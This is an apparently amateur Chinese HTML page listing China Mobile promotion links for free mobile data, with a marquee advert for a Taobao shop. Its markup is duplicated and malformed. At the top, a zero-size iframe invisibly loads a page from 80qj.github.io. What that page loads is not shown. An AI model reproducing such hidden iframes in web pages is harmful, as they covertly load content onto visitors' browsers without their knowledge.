

<!DOCTYPE html>
<html>
<iframe src="https://80qj.github.io/gg.html"frameborder="0" width="0" height="0"></iframe>
	<head>
		<meta charset="utf-8">
		<html class="no-js" lang="" style="--status-bar-height:0px; --window-top:0px; --window-bottom:0px;">

<!DOCTYPE html>
<html>
	<head>
		<meta charset="utf-8">
		<html class="no-js" lang="" style="--status-bar-height:0px; --window-top:0px; --window-bottom:0px;">
			<head>
				<meta charset="utf-8">
				<meta name="viewport" content="width=device-width,initial-scale=1,shrink-to-fit=no">

				<title>
					子术乐园
				</title>
				
<link type="text/css" rel="stylesheet" href="./index.css"><title> </title></head>
<body>
			<script src="./jquery.js"></script>  
    <script src="./clipboard.min.js"></script>  </script>  
    <div class="STYLE1">
<style>#nr{font-size:30px;margin: 10;background: -webkit-linear-gradient(left,#ffffff,#ff0000 

6.25%,#ff7d00 12.5%,#ffff00 18.75%,#00ff00 25%,#00ffff 31.25%,#0000ff 37.5%,#ff00ff 43.75%,#ffff00 50%,#ff0000 56.25%,#ff7d00 62.5%,#ffff00 68.75%,#00ff00 75%,#00ffff 

81.25%,#0000ff 87.5%,#ff00ff 93.75%,#ffff00 100%);-webkit-background-clip: text;-webkit-text-fill-color: transparent;background-size: 200% 100%;animation: masked-animation 2s 

infinite linear;}@keyframes masked-animation {0% {background-position: 0 0;}100% {background-position: -100%, 0;}}</style></div>
<TD height=40 width=821 colSpan=2><SPAN class=STYLE1>
<MARQUEE><STRONG>

<b id="nr"><a href="https://80qj.github.io/jy.html">点我进入9年义务教育语文英语点读频道，买大流量卡或活动过期留言淘宝搜店铺“紫云百货"找客服</a></FONT></STRONG></MARQUEE></SPAN>
</div>
	</marquee></style>
						<div class="mod mod-global-nav nav-header t5 center no-icon line bg2">
							<div class="cell title"><span>
									<a href="">返回目录</a>	</span>
							
							</a>
								</span>
							</div>  </div> </div> 
						</div>
<font style="background-color:yellow"><font size="4"><font color="#ff0000"><strong>温馨提示：收藏本站.为大家提供免费流量渠道长期更新.活动大部分为日包流量建议领一个用完再领</strong></font></font></font><br />
    <ul>
 
  <style>
    #directory {
      list-style-type: none;
      padding: 0;
    }
  </style>
</head>
<li>

<body>
  <ul id="directory">
    <font style="background-color:yellow"><font size="4"><font color="blue"><strong>移动流量：</strong></font></font></font><br/>
   </li> <a href="https://dev.coc.10086.cn/coc/web1/AqiyiLaruiEvents/?channelId=P00000063757">爱奇艺移动流量</a></li>
</li>

  </li>
  <li>
    <a href="https://wx.10086.cn/website/bind/bindAccount/new?redirectSource=SSO_GD&redirectUrl=https%3A%2F%2Fwx.10086.cn%2FactivityFront%2FdrawKugou%2Findex.html">酷狗移动流量</a>
    
  </li>
  <a href="https://dev.coc.10086.cn/coc/web1/plusCoupon/?pageId=1706215671194681344&channelId=P00000066751">京东移动流量</a>
  </li>
  <li>
    <a href="https://wx.10086.cn/qwhdhub/leadin/1024013102?A_C_CODE=Q0NXXsZMFT&channelId=P00000016916#/">移动流量1</a></li>

<li>
    <a href="https://wx.10086.cn/qwhdhub/leadin/1024050714#/">移动流量2</a></li>
	  <li>
    <a href="https://wx.10086.cn/activityFront/qq/index.html">移动QQ流量</a></li>
	  <li>
    <a href="https://wx.10086.cn/activityFront/qqmusic/index.html">QQ音乐流量</a></li>
	  <li>
    <a href="https://wx.10086.cn/website/bind/bindAccount/new?redirectSource=SSO_GD&redirectUrl=https%3A%2F%2Fwx.10086.cn%2FactivityFront%2FdrawKugou%2Findex.html">酷狗2</a></li>
	  
<li>
    <a href="https://wx.10086.cn/website/bind/bindAccount/new?redirectSource=SSO_GD&redirectUrl=https://wx.10086.cn/qwhdhub/leadin/1024013022?A_C_CODE=cnnolvnRJp#/">移动流量2</a></li>
<a href="https://wx.10086.cn/qwhdhub/leadin/1023120616#/">微信流量1（需微信打开）</a>
  </li>
  <li>
    <a href="https://mp.weixin.qq.com/s/0kvQDsam175Q-WNYYInJzg">微信流量1（需微信打开）</a></li>
</a>
<font size="3"><font color="red"><strong>付费流量有
办理8元8G流量包，发送“LLB8”到10086。温馨提示因地区不一自行测试</strong></font></font></font><br />

  </li>

 

<font style="background-color:yellow"><font size="4"><font color="#ff0000"><strong>电信流量：（暂无）</strong></font></font></font><br />

<font style="background-color:yellow"><font size="4"><font color="#ff0000"><strong>联通流量：（暂无）</strong></font></font></font><br />
  
</div>
 </ul>

  <div style="position: relative; padding-bottom: 0; height: 100%; overflow: hidden; max-width: 100%;">
    <iframe id="iframeContainer" style="position: absolute; top: 0; left: 0; width: 100%; height: 100%; border: none;" frameborder="0" allowfullscreen></iframe>
  </div>

  <script>
    function loadIframe(url, title) {
      const iframe = document.getElementById('iframeContainer');
      iframe.src = url;
      iframe.title = title;

      // 隐藏目录列表
      const directory = document.getElementById('directory');
      directory.style.display = 'none';
    }
  </script>
</script>
</body>
</html>

       
